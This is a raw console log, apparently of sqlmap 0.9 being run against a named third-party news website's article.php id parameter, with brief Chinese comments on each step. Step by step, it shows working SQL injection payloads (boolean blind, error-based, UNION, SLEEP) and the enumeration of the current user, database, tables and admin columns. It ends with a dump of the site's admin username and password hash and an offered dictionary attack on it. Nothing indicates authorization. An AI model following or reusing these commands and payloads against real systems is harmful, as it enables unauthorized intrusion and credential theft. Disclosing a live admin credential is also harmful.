D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-user /* 注解:获取当前用户名称!
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:53:54
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --current-db /*当前数据库
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:54:16
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:55:25
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.wepost.com.hk' shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:56:06
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
ssion': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+
shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net starting at: 16:57:14
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=276 AND 799=799
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack o
n retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+
shutting down at: 16:58:14
D:\Python27\sqlmap>